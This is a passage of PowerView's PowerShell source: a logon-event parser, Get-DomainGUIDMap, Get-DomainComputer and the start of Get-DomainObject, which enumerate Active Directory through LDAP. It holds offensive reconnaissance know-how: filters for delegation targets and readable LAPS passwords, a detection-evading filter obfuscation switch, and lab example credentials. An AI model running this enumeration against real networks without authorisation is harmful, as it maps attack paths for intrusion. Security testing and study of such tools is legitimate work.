$Properties[25].Value\n                                ElevatedToken             = $Properties[26].Value\n                            }\n                            $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonEvent')\n                            $Output\n                        }\n                    }\n\n                    # logon with explicit credential\n                    4648 {\n                        # skip computer logons, for now...\n                        if((-not $Properties[5].Value.EndsWith('$')) -and ($Properties[11].Value -match 'taskhost\\.exe')) {\n                            $Output = New-Object PSObject -Property @{\n                                ComputerName              = $Computer\n                                TimeCreated       = $Event.TimeCreated\n                                EventId           = $Event.Id\n                                SubjectUserSid    = $Properties[0].Value.ToString()\n                                SubjectUserName   = $Properties[1].Value\n                                SubjectDomainName = $Properties[2].Value\n                                SubjectLogonId    = $Properties[3].Value\n                                LogonGuid         = $Properties[4].Value.ToString()\n                                TargetUserName    = $Properties[5].Value\n                                TargetDomainName  = $Properties[6].Value\n                                TargetLogonGuid   = $Properties[7].Value\n                                TargetServerName  = $Properties[8].Value\n                                TargetInfo        = $Properties[9].Value\n                                ProcessId         = $Properties[10].Value\n                                ProcessName       = $Properties[11].Value\n                                IpAddress         = $Properties[12].Value\n                                IpPort            = $Properties[13].Value\n                            }\n                            $Output.PSObject.TypeNames.Insert(0, 'PowerView.ExplicitCredentialLogonEvent')\n                            $Output\n                        }\n                    }\n                    default {\n                        Write-Warning \"No handler exists for event ID: $($Event.Id)\"\n                    }\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainGUIDMap {\n<#\n.SYNOPSIS\n\nHelper to build a hash table of [GUID] -> resolved names for the current or specified Domain.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Get-Forest  \n\n.DESCRIPTION\n\nSearches the forest schema location (CN=Schema,CN=Configuration,DC=testlab,DC=local) for\nall objects with schemaIDGUID set and translates the GUIDs discovered to human-readable names.\nThen searches the extended rights location (CN=Extended-Rights,CN=Configuration,DC=testlab,DC=local)\nfor objects where objectClass=controlAccessRight, translating the GUIDs again.\n\nHeavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.OUTPUTS\n\nHashtable\n\nOuputs a hashtable containing a GUID -> Readable Name mapping.\n\n.LINK\n\nhttp://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([Hashtable])]\n    [CmdletBinding()]\n    Param (\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'}\n\n    $ForestArguments = @{}\n    if ($PSBoundParameters['Credential']) { $ForestArguments['Credential'] = $Credential }\n    $DomainDNArguments = @{}\n    if ($PSBoundParameters['Domain']) { $DomainDNArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Server']) { $DomainDNArguments['Server'] = $Server }\n    if ($PSBoundParameters['Credential']) { $DomainDNArguments['Credential'] = $Credential }\n    if ($PSBoundParameters['SSL']) { $DomainDNArguments['SSL'] = $SSL }\n\n\n    try {\n        $SchemaPath = (Get-Forest @ForestArguments).schema.name\n    }\n    catch {\n        $DomainDN = Get-DomainDN @DomainDNArguments\n        if ($DomainDN) {\n            $SchemaPath = \"CN=Schema,CN=Configuration,$($DomainDN)\"\n        }\n    }\n    if (-not $SchemaPath) {\n        throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest'\n    }\n\n    $SearcherArguments = @{\n        'SearchBase' = $SchemaPath\n    }\n    if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n    if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n    if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n    if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n    if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n\n    $LDAPFilter = '(schemaIDGUID=*)'\n    try {\n        $Results = Invoke-LDAPQuery @SearcherArguments -LDAPFilter \"$LDAPFilter\"\n        $Results | Where-Object {$_} | ForEach-Object {\n            if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                $Prop = @{}\n                foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                    if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate') -or $a -eq 'schemaidguid') {\n                        $Prop[$a] = $_.Attributes[$a]\n                    }\n                    else {\n                        $Values = @()\n                        foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                            $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                        }\n                        $Prop[$a] = $Values\n                    }\n                }\n            }\n            else {\n                $Prop = $_.Properties\n            }\n\n            $GUIDs[(New-Object Guid (,$Prop.schemaidguid[0])).Guid] = $Prop.name[0]\n        }\n        if ($Results) {\n            try { $Results.dispose() }\n            catch {\n                Write-Verbose \"[Get-DomainGUIDMap] Error disposing of the Results object: $_\"\n            }\n        }\n    }\n    catch {\n        Write-Verbose \"[Get-DomainGUIDMap] Error in building GUID map: $_\"\n    }\n\n    $SearcherArguments['SearchBase'] = $SchemaPath.replace('Schema','Extended-Rights')\n    $LDAPFilter = '(objectClass=controlAccessRight)'\n\n    try {\n        $Results = Invoke-LDAPQuery @SearcherArguments -LDAPFilter \"$LDAPFilter\"\n        $Results | Where-Object {$_} | ForEach-Object {\n            if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                $Prop = @{}\n                foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                    if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate')) {\n                        $Prop[$a] = $_.Attributes[$a]\n                    }\n                    else {\n                        $Values = @()\n                        foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                            $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                        }\n                        $Prop[$a] = $Values\n                    }\n                }\n            }\n            else {\n                $Prop = $_.Properties\n            }\n\n            $GUIDs[$Prop.rightsguid[0].toString()] = $Prop.name[0]\n        }\n        if ($Results) {\n            try { $Results.dispose() }\n            catch {\n                Write-Verbose \"[Get-DomainGUIDMap] Error disposing of the Results object: $_\"\n            }\n        }\n    }\n    catch {\n        Write-Verbose \"[Get-DomainGUIDMap] Error in building GUID map: $_\"\n    }\n\n    $GUIDs\n}\n\n\nfunction Get-DomainComputer {\n<#\n.SYNOPSIS\n\nReturn all computers or specific computer objects in AD.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty  \n\n.DESCRIPTION\n\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\nLDAP filter based on targeting/filter parameters, and searches for all objects\nmatching the criteria. To only return specific properties, use\n\"-Properties samaccountname,usnchanged,...\". By default, all computer objects for\nthe current domain are returned.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\nor a dns host name (e.g. windows10.testlab.local). Wildcards accepted.\n\n.PARAMETER UACFilter\n\nDynamic parameter that accepts one or more values from $UACEnum, including\n\"NOT_X\" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'.\n\n.PARAMETER Unconstrained\n\nSwitch. Return computer objects that have unconstrained delegation.\n\n.PARAMETER TrustedToAuth\n\nSwitch. Return computer objects that are trusted to authenticate for other principals.\n\n.PARAMETER RBCD\n\nSwitch. Return computer objects that are configured to allow resource-based constrained delegation.\n\n.PARAMETER Printers\n\nSwitch. Return only printers.\n\n.PARAMETER ExcludeDCs\n\nSwitch. Do not return domain controllers.\n\n.PARAMETER SPN\n\nReturn computers with a specific service principal name, wildcards accepted.\n\n.PARAMETER OperatingSystem\n\nReturn computers with a specific operating system, wildcards accepted.\n\n.PARAMETER ServicePack\n\nReturn computers with a specific service pack, wildcards accepted.\n\n.PARAMETER SiteName\n\nReturn computers in the specific AD Site name, wildcards accepted.\n\n.PARAMETER Ping\n\nSwitch. Ping each host to ensure it's up before enumerating.\n\n.PARAMETER LastLogon\n\nReturn computers that have logged on within a number of days.\n\n.PARAMETER HasLAPS\n\nSwitch. Return computers with LAPS enabled.\n\n.PARAMETER NoLAPS\n\nSwitch. Return computers without LAPS enabled.\n\n.PARAMETER CanReadLAPS\n\nSwitch. Return computers where the LAPS password is readable.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainComputer\n\nReturns the current computers in current domain.\n\n.EXAMPLE\n\nGet-DomainComputer -SPN mssql* -Domain testlab.local\n\nReturns all MS SQL servers in the testlab.local domain.\n\n.EXAMPLE\n\nGet-DomainComputer -UACFilter TRUSTED_FOR_DELEGATION,SERVER_TRUST_ACCOUNT -Properties dnshostname\n\nReturn the dns hostnames of servers trusted for delegation.\n\n.EXAMPLE\n\nGet-DomainComputer -SearchBase \"LDAP://OU=secret,DC=testlab,DC=local\" -Unconstrained\n\nSearch the specified OU for computeres that allow unconstrained delegation.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainComputer -Credential $Cred\n\n.OUTPUTS\n\nPowerView.Computer\n\nCustom PSObject with translated computer property fields.\n\nPowerView.Computer.Raw\n\nThe raw DirectoryServices.SearchResult object, if -Raw is enabled.\n#>\n\n    [OutputType('PowerView.Computer')]\n    [OutputType('PowerView.Computer.Raw')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('SamAccountName', 'Name', 'DNSHostName')]\n        [String[]]\n        $Identity,\n\n        [Switch]\n        $Unconstrained,\n\n        [Switch]\n        $TrustedToAuth,\n\n        [Switch]\n        $RBCD,\n\n        [Switch]\n        $Printers,\n\n        [Switch]\n        $ExcludeDCs,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ServicePrincipalName')]\n        [String]\n        $SPN,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $OperatingSystem,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ServicePack,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $SiteName,\n\n        [Switch]\n        $Ping,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $LastLogon,\n\n        [Switch]\n        $HasLAPS,\n\n        [Switch]\n        $NoLAPS,\n\n        [Switch]\n        $CanReadLAPS,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    DynamicParam {\n        $UACValueNames = [Enum]::GetNames($UACEnum)\n        # add in the negations\n        $UACValueNames = $UACValueNames | ForEach-Object {$_; \"NOT_$_\"}\n        # create new dynamic parameter\n        New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])\n    }\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n        if ($PSBoundParameters['FindOne']) { $SearcherArguments['FindOne'] = $FindOne }\n\n        $DNSearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $DNSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $DNSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SSL']) { $DNSearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$DNSearcherArguments['Obfuscate'] = $Obfuscate }\n\n    }\n\n    PROCESS {\n        #bind dynamic parameter to a friendly variable\n        if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {\n            New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters\n        }\n\n        $IdentityFilter = ''\n        $Filter = ''\n        $Identity | Where-Object {$_} | ForEach-Object {\n            $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n            if ($IdentityInstance -match '^S-1-') {\n                $IdentityFilter += \"(objectsid=$IdentityInstance)\"\n            }\n            elseif ($IdentityInstance -match '^CN=') {\n                $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                    # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                    #   and rebuild the domain searcher\n                    $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                    Write-Verbose \"[Get-DomainComputer] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                    $SearcherArguments['Domain'] = $IdentityDomain\n                    $CompSearcher = Get-DomainSearcher @SearcherArguments\n                    if (-not $CompSearcher) {\n                        Write-Warning \"[Get-DomainComputer] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                    }\n                }\n            }\n            elseif ($IdentityInstance.Contains('.')) {\n                $IdentityFilter += \"(|(name=$IdentityInstance)(dnshostname=$IdentityInstance))\"\n            }\n            elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {\n                $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\\' + $_.ToString('X2') }) -join ''\n                $IdentityFilter += \"(objectguid=$GuidByteString)\"\n            }\n            else {\n                $IdentityFilter += \"(name=$IdentityInstance)\"\n            }\n        }\n        if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n            $Filter += \"(|$IdentityFilter)\"\n        }\n\n        if ($PSBoundParameters['Unconstrained']) {\n            Write-Verbose '[Get-DomainComputer] Searching for computers with for unconstrained delegation'\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=524288)'\n        }\n        if ($PSBoundParameters['TrustedToAuth']) {\n            Write-Verbose '[Get-DomainComputer] Searching for computers that are trusted to authenticate for other principals'\n            $Filter += '(msds-allowedtodelegateto=*)'\n        }\n        if ($PSBoundParameters['RBCD']) {\n            Write-Verbose '[Get-DomainComputer] Searching for computers that are configured to allow resource-based constrained delegation'\n            $Filter += '(msds-allowedtoactonbehalfofotheridentity=*)'\n        }\n        if ($PSBoundParameters['Printers']) {\n            Write-Verbose '[Get-DomainComputer] Searching for printers'\n            $Filter += '(objectCategory=printQueue)'\n        }\n        if ($PSBoundParameters['ExcludeDCs']) {\n            Write-Verbose '[Get-DomainComputer] Excluding domain controllers'\n            $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=8192))'\n        }\n        if ($PSBoundParameters['SPN']) {\n            Write-Verbose \"[Get-DomainComputer] Searching for computers with SPN: $SPN\"\n            $Filter += \"(servicePrincipalName=$SPN)\"\n        }\n        if ($PSBoundParameters['OperatingSystem']) {\n            Write-Verbose \"[Get-DomainComputer] Searching for computers with operating system: $OperatingSystem\"\n            $Filter += \"(operatingsystem=$OperatingSystem)\"\n        }\n        if ($PSBoundParameters['ServicePack']) {\n            Write-Verbose \"[Get-DomainComputer] Searching for computers with service pack: $ServicePack\"\n            $Filter += \"(operatingsystemservicepack=$ServicePack)\"\n        }\n        if ($PSBoundParameters['SiteName']) {\n            Write-Verbose \"[Get-DomainComputer] Searching for computers with site name: $SiteName\"\n            $Filter += \"(serverreferencebl=$SiteName)\"\n        }\n        if ($PSBoundParameters['LastLogon']) {\n            Write-Verbose \"[Get-DomainComputer] Searching for computer accounts that have logged on within the last $PSBoundParameters['LastLogon'] days\"\n            $LogonDate = (Get-Date).AddDays(-$PSBoundParameters['LastLogon']).ToFileTime()\n            $Filter += \"(lastlogon>=$LogonDate)\"\n        }\n        if (($PSBoundParameters['HasLAPS']) -or ($PSBoundParameters['NoLAPS']) -or ($PSBoundParameters['CanReadLAPS'])) {\n            $SchemaDN = \"CN=Schema,CN=Configuration,$(Get-DomainDN @DNSearcherArguments)\"\n            $AttrFilter = ''\n            Write-Verbose \"[Get-DomainComputer] Using distinguished name: $SchemaDN\"\n            if ($PSBoundParameters['HasLAPS']) {\n                # Searching for attribute name, which can differ as per pingcastle by @vletoux\n                # https://github.com/vletoux/pingcastle/blob/master/Scanners/LAPSBitLocker.cs\n                Get-DomainObject -SearchBase $SchemaDN -LDAPFilter \"(name=ms-*-admpwd*)\" -Properties 'name' @SearcherArguments | select -expand name | ForEach-Object {\n                    Write-Verbose \"[Get-DomainComputer] Searching for attribute: $_\"\n                    $AttrFilter += \"($_=*)\"\n                }\n                if ($AttrFilter) { $Filter += \"(|$AttrFilter)\" }\n            }\n            if ($PSBoundParameters['NoLAPS']) {\n                # Searching for attribute name, which can differ as per pingcastle by @vletoux\n                # https://github.com/vletoux/pingcastle/blob/master/Scanners/LAPSBitLocker.cs\n                Get-DomainObject -SearchBase $SchemaDN -LDAPFilter \"(name=ms-*-admpwd*)\" -Properties 'name' @SearcherArguments | select -expand name | ForEach-Object {\n                    Write-Verbose \"[Get-DomainComputer] Searching for attribute: $_\"\n                    $AttrFilter += \"(!($_=*))\"\n                }\n                if ($AttrFilter) { $Filter += \"(&$AttrFilter)\" }\n            }\n            if ($PSBoundParameters['CanReadLAPS']) {\n                # Searching for attribute name, which can differ as per pingcastle by @vletoux\n                # https://github.com/vletoux/pingcastle/blob/master/Scanners/LAPSBitLocker.cs\n                Get-DomainObject -SearchBase $SchemaDN -LDAPFilter \"(name=ms-*-admpwd)\" -Properties 'name' @SearcherArguments | select -expand name | ForEach-Object {\n                    Write-Verbose \"[Get-DomainComputer] Searching for attribute: $_\"\n                    $AttrFilter += \"($_=*)\"\n                }\n                if ($AttrFilter) { $Filter += \"(|$AttrFilter)\" }\n            }\n        }\n        if ($PSBoundParameters['LDAPFilter']) {\n            Write-Verbose \"[Get-DomainComputer] Using additional LDAP filter: $LDAPFilter\"\n            $Filter += \"$LDAPFilter\"\n        }\n        # build the LDAP filter for the dynamic UAC filter value\n        $UACFilter | Where-Object {$_} | ForEach-Object {\n            if ($_ -match 'NOT_.*') {\n                $UACField = $_.Substring(4)\n                $UACValue = [Int]($UACEnum::$UACField)\n                $Filter += \"(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))\"\n            }\n            else {\n                $UACValue = [Int]($UACEnum::$_)\n                $Filter += \"(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)\"\n            }\n        }\n\n\n\n        $Results = Invoke-LDAPQuery @SearcherArguments -LDAPFilter \"(&(samAccountType=805306369)$Filter)\"\n        $Results | Where-Object {$_} | ForEach-Object {\n            if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                $Prop = @{}\n                foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                    if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate')) {\n                        $Prop[$a] = $_.Attributes[$a]\n                    }\n                    else {\n                        $Values = @()\n                        foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                            $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                        }\n                        $Prop[$a] = $Values\n                    }\n                }\n            }\n            else {\n                $Prop = $_.Properties\n            }\n\n            $Up = $True\n            if ($PSBoundParameters['Ping']) {\n                $Up = Test-Connection -Count 1 -Quiet -ComputerName $Prop.dnshostname\n            }\n            if ($Up) {\n                if ($PSBoundParameters['Raw']) {\n                    # return raw result objects\n                    $Computer = $_\n                    $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer.Raw')\n                }\n                else {\n                    $Computer = Convert-LDAPProperty -Properties $Prop\n                    $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer')\n                }\n                $Computer\n            }\n        }\n        if ($Results) {\n            try { $Results.dispose() }\n            catch {\n                Write-Verbose \"[Get-DomainComputer] Error disposing of the Results object: $_\"\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainObject {\n<#\n.SYNOPSIS\n\nReturn all (or specified) domain objects in AD.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName  \n\n.DESCRIPTION\n\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\nLDAP filter based on targeting/filter parameters, and searches for all objects\nmatching the criteria. To only return specific properties, use\n\"-Properties samaccountname,usnchanged,...\". By default, all objects for\nthe current domain are returned.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted.\n\n.PARAMETER UACFilter\n\nDynamic parameter that accepts one or more values from $UACEnum, including\n\"NOT_X\" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainObject -Domain testlab.local\n\nReturn all objects for the testlab.local domain\n\n.EXAMPLE\n\n'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname\n\ndistinguishedname\n-----------------\nCN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local\nCN=dfm,CN=Users,DC=testlab,DC=local\nOU=OU3,DC=testlab,DC=local\nCN=dfm (admin),CN=Users,DC=testlab,DC=local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainObject -Credential $Cred -Identity 'windows1'\n\n.EXAMPLE\n\nGet-Domain | Select-Object -Expand name\ntestlab.local\n\n'testlab\\harmj0y','DEV\\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainUser] Extracted domain 'testlab.local' from 'testlab\\harmj0y'\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))\n\ndistinguishedname\n-----------------\nCN=harmj0y,CN=Users,DC=testlab,DC=local\nVERBOSE: [Get-DomainUser] Extracted domain 'dev.testlab.local' from 'DEV\\Domain Admins'\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\nVERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins)))\nCN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local\n\n.OUTPUTS\n\nPowerView.ADObject\n\nCustom PSObject with translated AD object property fields.\n\nPowerView.ADObject.Raw\n\nThe raw DirectoryServices.SearchResult object, if -Raw is enabled.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [OutputType('PowerView.ADObject')]\n    [OutputType('PowerView.ADObject.Raw')]\n    [CmdletBinding()]\n    Param(\n        